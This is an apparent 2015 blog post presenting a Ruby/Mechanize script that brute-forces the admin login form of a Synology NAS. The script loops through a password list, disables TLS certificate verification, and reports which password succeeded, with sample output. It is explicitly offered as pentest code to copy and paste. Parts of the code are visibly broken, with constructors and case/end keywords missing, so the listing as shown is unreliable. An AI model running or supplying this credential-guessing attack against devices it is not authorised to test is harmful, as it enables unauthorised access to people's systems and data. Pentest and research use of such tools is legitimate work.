Thursday, January 29, 2015

Writing a web form bruteforcer in Ruby

Testing weak credentials on web application or devices that use web form authentication is a very common and popular thing to do during pentests. A lot of times, you'll come across a device and the only way to interact with the device is via the web interface. A web interface that commonly requires authentication via submitted form fields.

I decided I wanted to write my own bruteforcer for a Synology NAS I happen to have on hand. Now people commonly suggest using Nokogiri to interact and parse webpages. Thats all fine and dandy for the simpler/more straightforward webcode, but when you start getting into web2.0 stuff or if you just dont want to deal with it, I've found that Mechanize helps tremendously.

Below is the final code i came up with. It's fairly simple. It takes in a file called "passlist.txt" which will be the password dictionary file, and for every password in that file it will attempt a login to the login webpage. It will detect the returned response body for a success or failure. (this is mainly meant as a PoC, not as a tool)

require 'rubygems'
require 'mechanize'
#this script will brute force the web form login for a synology nas

passwordlist ="passlist.txt")
agent ={|a| 
    a.verify_mode = OpenSSL::SSL::VERIFY_NONE
target = 'https://NASIPHere:5001/webman/index.cgi'
user = 'admin'

passwordlist.each do |password|
    page  = agent.get target

    # Fill out the login form
    form          = page.form_with :id => 'login-form'
    form.username = user
    form.passwd   = password.chomp #this is important otherwise the newline will break the auth and everything fails
    result = form.submit

    when result.body =~ /"success" : false/ then puts "Failure with #{password}"
    when result.body =~ /"success" : true/ then puts "SUCCESSFUL LOGIN WITH #{password}"
    else puts "Unknown response body when using \"#{password}\": #{result.body}"

Running the script yields the following output:

ruby synology-web-form-brute.rb
Failure with admin
Failure with kittens

Again, this is not meant to be fancy/groundbreaking/or anything other than some code to copy and paste if you need to.

(There are a variety of tools that will do the same thing or a very similar attack much faster than this, such as hydra/medusa/burp/etc.)

No comments:

Post a Comment